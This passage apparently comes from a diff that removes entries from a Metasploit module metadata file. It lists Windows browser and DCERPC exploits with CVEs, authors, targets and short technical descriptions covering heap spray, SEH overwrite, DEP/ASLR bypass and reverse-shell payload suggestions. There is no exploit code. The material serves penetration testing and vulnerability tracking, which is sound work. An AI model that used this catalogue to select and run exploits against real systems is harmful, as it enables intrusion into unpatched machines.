false, - "needs_cleanup": null - }, - "exploit_windows/browser/tumbleweed_filetransfer": { - "name": "Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/tumbleweed_filetransfer", - "aliases": [], - "rank": 500, - "disclosure_date": "2008-04-07", - "type": "exploit", - "author": [ - "aushack " - ], - "description": "This module exploits a stack buffer overflow in the vcst_eu.dll\n FileTransfer Module (1.0.0.5) ActiveX control in the Tumbleweed\n SecureTransport suite. By sending an overly long string to the\n TransferFile() 'remotefile' function, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2008-1724", - "OSVDB-44252", - "URL-http://www.aushack.com/200708-tumbleweed.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Universal vcst_eu.dll", - "Windows 2000 Pro English", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/tumbleweed_filetransfer.rb", - "is_install_path": true, - "ref_name": "windows/browser/tumbleweed_filetransfer", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ubisoft_uplay_cmd_exec": { - "name": "Ubisoft uplay 2.0.3 ActiveX Control Arbitrary Code Execution", - "fullname": "exploit/windows/browser/ubisoft_uplay_cmd_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-07-29", - "type": "exploit", - "author": [ - "Tavis Ormandy ", - "Ben Campbell ", - "phillips321 ", - "Richard Hicks " - ], - "description": "The uplay ActiveX component allows an attacker to execute any command line action.\n User must sign in, unless auto-sign in is enabled and uplay must not already be\n running. Due to the way the malicious executable is served (WebDAV), the module\n must be run on port 80, so please make sure you have enough privilege to do that.\n Ubisoft released patch 2.04 as of Mon 20th July.", - "references": [ - "CVE-2012-4177", - "OSVDB-84402", - "URL-https://seclists.org/fulldisclosure/2012/Jul/375", - "URL-http://forums.ubi.com/showthread.php/699940-Uplay-PC-Patch-2-0-4-Security-fix" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ubisoft_uplay_cmd_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/ubisoft_uplay_cmd_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ultramjcam_openfiledig_bof": { - "name": "TRENDnet SecurView Internet Camera UltraMJCam OpenFileDlg Buffer Overflow", - "fullname": "exploit/windows/browser/ultramjcam_openfiledig_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-28", - "type": "exploit", - "author": [ - "rgod", - "sinn3r " - ], - "description": "This module exploits a vulnerability found in TRENDnet SecurView Internet\n Camera's ActiveX control. By supplying a long string of data as the sFilter\n argument of the OpenFileDlg() function, it is possible to trigger a buffer\n overflow condition due to WideCharToMultiByte (which converts unicode back to)\n overwriting the stack more than it should, which results arbitrary code execution\n under the context of the user.", - "references": [ - "CVE-2012-4876", - "OSVDB-80661", - "EDB-18675" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "IE 6 on Windows XP SP3", - "IE 7 on Windows XP SP3", - "IE 7 on Windows Vista" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ultramjcam_openfiledig_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/ultramjcam_openfiledig_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/ultraoffice_httpupload": { - "name": "Ultra Shareware Office Control ActiveX HttpUpload Buffer Overflow", - "fullname": "exploit/windows/browser/ultraoffice_httpupload", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-08-27", - "type": "exploit", - "author": [ - "shinnai", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in Ultra Shareware's Office\n Control. When processing the 'HttpUpload' method, the arguments are concatenated\n together to form a command line to run a bundled version of cURL. If the command\n fails to run, a stack-based buffer overflow occurs when building the error\n message. This is due to the use of sprintf() without proper bounds checking.\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.", - "references": [ - "CVE-2008-3878", - "OSVDB-47866", - "BID-30861", - "EDB-6318" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/ultraoffice_httpupload.rb", - "is_install_path": true, - "ref_name": "windows/browser/ultraoffice_httpupload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/verypdf_pdfview": { - "name": "VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow", - "fullname": "exploit/windows/browser/verypdf_pdfview", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-06-16", - "type": "exploit", - "author": [ - "MC ", - "dean " - ], - "description": "The VeryPDF PDFView ActiveX control is prone to a heap buffer-overflow\n because it fails to properly bounds-check user-supplied data before copying\n it into an insufficiently sized memory buffer. An attacker can exploit this issue\n to execute arbitrary code within the context of the affected application.", - "references": [ - "CVE-2008-5492", - "OSVDB-49871", - "BID-32313" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/verypdf_pdfview.rb", - "is_install_path": true, - "ref_name": "windows/browser/verypdf_pdfview", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/viscom_movieplayer_drawtext": { - "name": "Viscom Software Movie Player Pro SDK ActiveX 6.8", - "fullname": "exploit/windows/browser/viscom_movieplayer_drawtext", - "aliases": [], - "rank": 300, - "disclosure_date": "2010-01-12", - "type": "exploit", - "author": [ - "shinnai", - "TecR0c ", - "mr_me " - ], - "description": "Stack-based buffer overflow in the MOVIEPLAYER.MoviePlayerCtrl.1 ActiveX control\n in MoviePlayer.ocx 6.8.0.0 in Viscom Software Movie Player Pro SDK ActiveX 6.8 allows\n remote attackers to execute arbitrary code via a long strFontName parameter to the\n DrawText method.\n\n The victim will first be required to trust the publisher Viscom Software.\n This module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7\n with Java support.", - "references": [ - "CVE-2010-0356", - "OSVDB-61634", - "EDB-12320" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows IE6-7", - "Windows IE8 + JAVA 6 (DEP & ASLR BYPASS)" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb", - "is_install_path": true, - "ref_name": "windows/browser/viscom_movieplayer_drawtext", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/vlc_amv": { - "name": "VLC AMV Dangling Pointer Vulnerability", - "fullname": "exploit/windows/browser/vlc_amv", - "aliases": [], - "rank": 400, - "disclosure_date": "2011-03-23", - "type": "exploit", - "author": [ - "sinn3r " - ], - "description": "This module exploits VLC media player when handling a .AMV file. By flipping\n the 0x41st byte in the file format (video width/height), VLC crashes due to an\n invalid pointer, which allows remote attackers to gain arbitrary code execution.\n The vulnerable packages include: VLC 1.1.4, VLC 1.1.5, VLC 1.1.6, VLC 1.1.7. Also,\n please note that IE 8 targets require Java support in order to run properly.", - "references": [ - "CVE-2010-3275", - "OSVDB-71277", - "URL-http://www.coresecurity.com/content/vlc-vulnerabilities-amv-nsv-files", - "URL-http://web.archive.org/web/20130610070348/http://git.videolan.org/?p=vlc/vlc-1.1.git;a=commitdiff;h=fe44129dc6509b3347113ab0e1a0524af1e0dd11" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 6 on XP SP3", - "Internet Explorer 7 on XP SP3", - "Internet Explorer 8 on XP SP3", - "Internet Explorer 7 on Vista" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/vlc_amv.rb", - "is_install_path": true, - "ref_name": "windows/browser/vlc_amv", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/vlc_mms_bof": { - "name": "VLC MMS Stream Handling Buffer Overflow", - "fullname": "exploit/windows/browser/vlc_mms_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2012-03-15", - "type": "exploit", - "author": [ - "Florent Hochwelker", - "sinn3r ", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in VLC media player VLC media player prior\n to 2.0.0. The vulnerability is due to a dangerous use of sprintf which can result\n in a stack buffer overflow when handling a malicious MMS URI.\n\n This module uses the browser as attack vector. A specially crafted MMS URI is\n used to trigger the overflow and get flow control through SEH overwrite. Control\n is transferred to code located in the heap through a standard heap spray.\n\n The module only targets IE6 and IE7 because no DEP/ASLR bypass has been provided.", - "references": [ - "CVE-2012-1775", - "OSVDB-80188", - "URL-http://www.videolan.org/security/sa1201.html", - "URL-http://web.archive.org/web/20130612051447/http://git.videolan.org/?p=vlc/vlc-2.0.git;a=commit;h=11a95cce96fffdbaba1be6034d7b42721667821c" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Internet Explorer 6 on XP SP3", - "Internet Explorer 7 on XP SP3" - ], - "mod_time": "2025-02-28 09:35:28 +0000", - "path": "/modules/exploits/windows/browser/vlc_mms_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/vlc_mms_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/webdav_dll_hijacker": { - "name": "WebDAV Application DLL Hijacker", - "fullname": "exploit/windows/browser/webdav_dll_hijacker", - "aliases": [], - "rank": 0, - "disclosure_date": "2010-08-18", - "type": "exploit", - "author": [ - "hdm ", - "jduck ", - "jcran " - ], - "description": "This module presents a directory of file extensions that can lead to\n code execution when opened from the share. The default EXTENSIONS option\n must be configured to specify a vulnerable application type.", - "references": [ - "URL-http://blog.zoller.lu/2010/08/cve-2010-xn-loadlibrarygetprocaddress.html", - "URL-http://www.acrossecurity.com/aspr/ASPR-2010-08-18-1-PUB.txt" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/webdav_dll_hijacker.rb", - "is_install_path": true, - "ref_name": "windows/browser/webdav_dll_hijacker", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/webex_ucf_newobject": { - "name": "WebEx UCF atucfobj.dll ActiveX NewObject Method Buffer Overflow", - "fullname": "exploit/windows/browser/webex_ucf_newobject", - "aliases": [], - "rank": 400, - "disclosure_date": "2008-08-06", - "type": "exploit", - "author": [ - "Tobias Klein", - "Elazar Broad", - "Guido Landi", - "jduck " - ], - "description": "This module exploits a stack-based buffer overflow in WebEx's WebexUCFObject\n ActiveX Control. If a long string is passed to the 'NewObject' method, a stack-\n based buffer overflow will occur when copying attacker-supplied data using the\n sprintf function.\n\n It is noteworthy that this vulnerability was discovered and reported by multiple\n independent researchers. To quote iDefense's advisory, \"Before this issue was\n publicly reported, at least three independent security researchers had knowledge\n of this issue; thus, it is reasonable to believe that even more people were aware\n of this issue before disclosure.\"\n\n NOTE: Due to input restrictions, this exploit uses a heap-spray to get the payload\n into memory unmodified.", - "references": [ - "CVE-2008-3558", - "OSVDB-47344", - "BID-30578", - "EDB-6220", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=849", - "URL-http://www.trapkit.de/advisories/TKADV2008-009.txt", - "URL-http://tk-blog.blogspot.com/2008/09/vulnerability-rediscovery-xss-and-webex.html", - "URL-http://archives.neohapsis.com/archives/fulldisclosure/2008-08/0084.html", - "URL-http://www.cisco.com/en/US/products/products_security_advisory09186a00809e2006.shtml" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/webex_ucf_newobject.rb", - "is_install_path": true, - "ref_name": "windows/browser/webex_ucf_newobject", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/wellintech_kingscada_kxclientdownload": { - "name": "KingScada kxClientDownload.ocx ActiveX Remote Code Execution", - "fullname": "exploit/windows/browser/wellintech_kingscada_kxclientdownload", - "aliases": [], - "rank": 400, - "disclosure_date": "2014-01-14", - "type": "exploit", - "author": [ - "Andrea Micalizzi", - "juan vazquez " - ], - "description": "This module abuses the kxClientDownload.ocx ActiveX control distributed with WellingTech KingScada.\n The ProjectURL property can be abused to download and load arbitrary DLLs from\n arbitrary locations, leading to arbitrary code execution, because of a dangerous\n usage of LoadLibrary. Due to the nature of the vulnerability, this module will work\n only when Protected Mode is not present or not enabled.", - "references": [ - "CVE-2013-2827", - "OSVDB-102135", - "BID-64941", - "ZDI-14-011", - "URL-http://ics-cert.us-cert.gov/advisories/ICSA-13-344-01" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/wellintech_kingscada_kxclientdownload.rb", - "is_install_path": true, - "ref_name": "windows/browser/wellintech_kingscada_kxclientdownload", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/winamp_playlist_unc": { - "name": "Winamp Playlist UNC Path Computer Name Overflow", - "fullname": "exploit/windows/browser/winamp_playlist_unc", - "aliases": [], - "rank": 500, - "disclosure_date": "2006-01-29", - "type": "exploit", - "author": [ - "hdm ", - "Faithless " - ], - "description": "This module exploits a vulnerability in the Winamp media player.\n This flaw is triggered when an audio file path is specified, inside a\n playlist, that consists of a UNC path with a long computer name. This\n module delivers the playlist via the browser. This module has only\n been successfully tested on Winamp 5.11 and 5.12.", - "references": [ - "CVE-2006-0476", - "OSVDB-22789", - "BID-16410" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Winamp 5.12 Universal" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/winamp_playlist_unc.rb", - "is_install_path": true, - "ref_name": "windows/browser/winamp_playlist_unc", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/winamp_ultravox": { - "name": "Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow", - "fullname": "exploit/windows/browser/winamp_ultravox", - "aliases": [], - "rank": 300, - "disclosure_date": "2008-01-18", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in Winamp 5.24. By\n sending an overly long artist tag, a remote attacker may\n be able to execute arbitrary code. This vulnerability can be\n exploited from the browser or the Winamp client itself.", - "references": [ - "CVE-2008-0065", - "OSVDB-41707", - "BID-27344" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Winamp 5.24" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/winamp_ultravox.rb", - "is_install_path": true, - "ref_name": "windows/browser/winamp_ultravox", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/windvd7_applicationtype": { - "name": "WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/windvd7_applicationtype", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-03-20", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in IASystemInfo.dll ActiveX\n control in InterVideo WinDVD 7. By sending an overly long string\n to the \"ApplicationType()\" property, an attacker may be able to\n execute arbitrary code.", - "references": [ - "CVE-2007-0348", - "OSVDB-34315", - "BID-23071" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English ALL", - "Windows XP Pro SP0/SP1 English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/windvd7_applicationtype.rb", - "is_install_path": true, - "ref_name": "windows/browser/windvd7_applicationtype", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/winzip_fileview": { - "name": "WinZip FileView (WZFILEVIEW.FileViewCtrl.61) ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/winzip_fileview", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-11-02", - "type": "exploit", - "author": [ - "dean " - ], - "description": "The FileView ActiveX control (WZFILEVIEW.FileViewCtrl.61) could allow a\n remote attacker to execute arbitrary code on the system. The control contains\n several unsafe methods and is marked safe for scripting and safe for initialization.\n A remote attacker could exploit this vulnerability to execute arbitrary code on the\n victim system. WinZip 10.0 <= Build 6667 are vulnerable.", - "references": [ - "CVE-2006-5198", - "OSVDB-30433", - "BID-21060" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0-SP2/ IE 6.0 SP0-SP2 / IE 7" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/winzip_fileview.rb", - "is_install_path": true, - "ref_name": "windows/browser/winzip_fileview", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/wmi_admintools": { - "name": "Microsoft WMI Administration Tools ActiveX Buffer Overflow", - "fullname": "exploit/windows/browser/wmi_admintools", - "aliases": [], - "rank": 500, - "disclosure_date": "2010-12-21", - "type": "exploit", - "author": [ - "WooYun", - "MC ", - "jduck " - ], - "description": "This module exploits a memory trust issue in the Microsoft WMI\n Administration tools ActiveX control. When processing a specially crafted\n HTML page, the WEBSingleView.ocx ActiveX Control (1.50.1131.0) will treat\n the 'lCtxHandle' parameter to the 'AddContextRef' and 'ReleaseContext' methods\n as a trusted pointer. It makes an indirect call via this pointer which leads\n to arbitrary code execution.\n\n This exploit utilizes a combination of heap spraying and the\n .NET 2.0 'mscorie.dll' module to bypass DEP and ASLR. This module does not\n opt-in to ASLR. As such, this module should be reliable on all Windows\n versions.\n\n The WMI Administrative Tools are a standalone download & install (linked in the\n references).", - "references": [ - "OSVDB-69942", - "CVE-2010-3973", - "BID-45546", - "URL-http://wooyun.org/bug.php?action=view&id=1006", - "URL-http://web.archive.org/web/20101228043011/http://secunia.com:80/advisories/42693", - "URL-http://www.microsoft.com/downloads/en/details.aspx?FamilyID=6430f853-1120-48db-8cc5-f2abdc3ed314" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic", - "Windows Universal", - "Debug Target (Crash)" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/wmi_admintools.rb", - "is_install_path": true, - "ref_name": "windows/browser/wmi_admintools", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/x360_video_player_set_text_bof": { - "name": "X360 VideoPlayer ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/x360_video_player_set_text_bof", - "aliases": [], - "rank": 300, - "disclosure_date": "2015-01-30", - "type": "exploit", - "author": [ - "Rh0", - "juan vazquez " - ], - "description": "This module exploits a buffer overflow in the VideoPlayer.ocx ActiveX installed with the\n X360 Software. By setting an overly long value to 'ConvertFile()', an attacker can overrun\n a .data buffer to bypass ASLR/DEP and finally execute arbitrary code.", - "references": [ - "EDB-35948", - "URL-https://rh0dev.github.io/blog/2015/fun-with-info-leaks/" - ], - "platform": "Windows", - "arch": "x86", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/x360_video_player_set_text_bof.rb", - "is_install_path": true, - "ref_name": "windows/browser/x360_video_player_set_text_bof", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/xmplay_asx": { - "name": "XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow", - "fullname": "exploit/windows/browser/xmplay_asx", - "aliases": [], - "rank": 400, - "disclosure_date": "2006-11-21", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in XMPlay 3.3.0.4.\n The vulnerability is caused due to a boundary error within\n the parsing of playlists containing an overly long file name.\n This module uses the ASX file format.", - "references": [ - "CVE-2006-6063", - "OSVDB-30537", - "BID-21206", - "URL-http://web.archive.org/web/20070502134818/http://secunia.com:80/advisories/22999" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows 2000 Pro English SP4", - "Windows XP Pro SP2 English" - ], - "mod_time": "2023-03-23 10:19:30 +0000", - "path": "/modules/exploits/windows/browser/xmplay_asx.rb", - "is_install_path": true, - "ref_name": "windows/browser/xmplay_asx", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/yahoomessenger_fvcom": { - "name": "Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/yahoomessenger_fvcom", - "aliases": [], - "rank": 300, - "disclosure_date": "2007-08-30", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Yahoo! Messenger ActiveX\n Control (YVerInfo.dll <= 2006.8.24.1). By sending an overly long string\n to the \"fvCom()\" method from a yahoo.com domain, an attacker may be able\n to execute arbitrary code.", - "references": [ - "CVE-2007-4515", - "OSVDB-37739", - "BID-25494", - "URL-http://labs.idefense.com/intelligence/vulnerabilities/display.php?id=591" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP2 Pro English" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/yahoomessenger_fvcom.rb", - "is_install_path": true, - "ref_name": "windows/browser/yahoomessenger_fvcom", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/yahoomessenger_server": { - "name": "Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow", - "fullname": "exploit/windows/browser/yahoomessenger_server", - "aliases": [], - "rank": 400, - "disclosure_date": "2007-06-05", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module exploits a stack buffer overflow in the Yahoo! Webcam Upload ActiveX\n Control (ywcupl.dll) provided by Yahoo! Messenger version 8.1.0.249.\n By sending an overly long string to the \"Server()\" method, and then calling\n the \"Send()\" method, an attacker may be able to execute arbitrary code.\n Using the payloads \"windows/shell_bind_tcp\" and \"windows/shell_reverse_tcp\"\n yield for the best results.", - "references": [ - "CVE-2007-3147", - "OSVDB-37082" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows XP SP0/SP1 Pro English", - "Windows 2000 Pro English All" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/yahoomessenger_server.rb", - "is_install_path": true, - "ref_name": "windows/browser/yahoomessenger_server", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/zenturiprogramchecker_unsafe": { - "name": "Zenturi ProgramChecker ActiveX Control Arbitrary File Download", - "fullname": "exploit/windows/browser/zenturiprogramchecker_unsafe", - "aliases": [], - "rank": 600, - "disclosure_date": "2007-05-29", - "type": "exploit", - "author": [ - "MC " - ], - "description": "This module allows remote attackers to place arbitrary files on a users file system\n via the Zenturi ProgramChecker sasatl.dll (1.5.0.531) ActiveX Control.", - "references": [ - "CVE-2007-2987", - "OSVDB-36715", - "BID-24217" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Automatic" - ], - "mod_time": "2020-10-02 17:38:06 +0000", - "path": "/modules/exploits/windows/browser/zenturiprogramchecker_unsafe.rb", - "is_install_path": true, - "ref_name": "windows/browser/zenturiprogramchecker_unsafe", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/browser/zenworks_helplauncher_exec": { - "name": "AdminStudio LaunchHelp.dll ActiveX Arbitrary Code Execution", - "fullname": "exploit/windows/browser/zenworks_helplauncher_exec", - "aliases": [], - "rank": 300, - "disclosure_date": "2011-10-19", - "type": "exploit", - "author": [ - "rgod", - "juan vazquez " - ], - "description": "This module exploits a vulnerability in AdminStudio LaunchHelp.dll ActiveX control. The\n LaunchProcess function found in LaunchHelp.HelpLauncher.1 allows remote attackers to run\n arbitrary commands on the victim machine. This module has been successfully tested with the\n ActiveX installed with AdminStudio 9.5, which also comes with Novell ZENworks Configuration\n Management 10 SP2, on IE 6 and IE 8 over Windows XP SP 3.", - "references": [ - "CVE-2011-2657", - "OSVDB-76700", - "BID-50274", - "ZDI-11-318", - "URL-http://www.novell.com/support/viewContent.do?externalId=7009570&sliceId=1" - ], - "platform": "Windows", - "arch": "", - "rport": null, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows Universal" - ], - "mod_time": "2021-10-06 13:43:31 +0000", - "path": "/modules/exploits/windows/browser/zenworks_helplauncher_exec.rb", - "is_install_path": true, - "ref_name": "windows/browser/zenworks_helplauncher_exec", - "check": false, - "post_auth": false, - "default_credential": false, - "notes": {}, - "session_types": false, - "needs_cleanup": true - }, - "exploit_windows/dcerpc/cve_2021_1675_printnightmare": { - "name": "Print Spooler Remote DLL Injection", - "fullname": "exploit/windows/dcerpc/cve_2021_1675_printnightmare", - "aliases": [ - "auxiliary/admin/dcerpc/cve_2021_1675_printnightmare" - ], - "rank": 300, - "disclosure_date": "2021-06-08", - "type": "exploit", - "author": [ - "Zhiniang Peng", - "Xuefeng Li", - "Zhipeng Huo", - "Piotr Madej", - "Zhang Yunhai", - "cube0x0", - "Spencer McIntyre", - "Christophe De La Fuente" - ], - "description": "The print spooler service can be abused by an authenticated remote attacker to load a DLL through a crafted\n DCERPC request, resulting in remote code execution as NT AUTHORITY\\SYSTEM. This module uses the MS-RPRN\n vector which requires the Print Spooler service to be running.", - "references": [ - "CVE-2021-1675", - "CVE-2021-34527", - "URL-https://github.com/cube0x0/CVE-2021-1675", - "URL-https://web.archive.org/web/20210701042336/https://github.com/afwu/PrintNightmare", - "URL-https://github.com/calebstewart/CVE-2021-1675/blob/main/CVE-2021-1675.ps1", - "URL-https://github.com/byt3bl33d3r/ItWasAllADream" - ], - "platform": "", - "arch": "", - "rport": 445, - "autofilter_ports": [ - 139, - 445 - ], - "autofilter_services": [ - "netbios-ssn", - "microsoft-ds" - ], - "targets": [ - "Windows" - ], - "mod_time": "2022-05-24 09:16:30 +0000", - "path": "/modules/exploits/windows/dcerpc/cve_2021_1675_printnightmare.rb", - "is_install_path": true, - "ref_name": "windows/dcerpc/cve_2021_1675_printnightmare", - "check": true, - "post_auth": false, - "default_credential": false, - "notes": { - "AKA": [ - "PrintNightmare" - ], - "Stability": [ - "crash-service-down" - ], - "Reliability": [ - "unreliable-session" - ], - "SideEffects": [ - "artifacts-on-disk" - ] - }, - "session_types": false, - "needs_cleanup": null - }, - "exploit_windows/dcerpc/ms03_026_dcom": { - "name": "MS03-026 Microsoft RPC DCOM Interface Overflow", - "fullname": "exploit/windows/dcerpc/ms03_026_dcom", - "aliases": [], - "rank": 500, - "disclosure_date": "2003-07-16", - "type": "exploit", - "author": [ - "hdm ", - "spoonm ", - "cazz " - ], - "description": "This module exploits a stack buffer overflow in the RPCSS service, this vulnerability\n was originally found by the Last Stage of Delirium research group and has been\n widely exploited ever since. This module can exploit the English versions of\n Windows NT 4.0 SP3-6a, Windows 2000, Windows XP, and Windows 2003 all in one request :)", - "references": [ - "CVE-2003-0352", - "OSVDB-2100", - "MSB-MS03-026", - "BID-8205" - ], - "platform": "Windows", - "arch": "", - "rport": 135, - "autofilter_ports": [], - "autofilter_services": [], - "targets": [ - "Windows NT SP3-6a/2000/XP/2003 Universal" - ], - "mod_time": "2021-11-28 08:25:31 +0000", - "path": "/modules/exploits/windows/dcerpc/ms03_026_dcom.rb", - "is_install_path": true, - "ref_name": 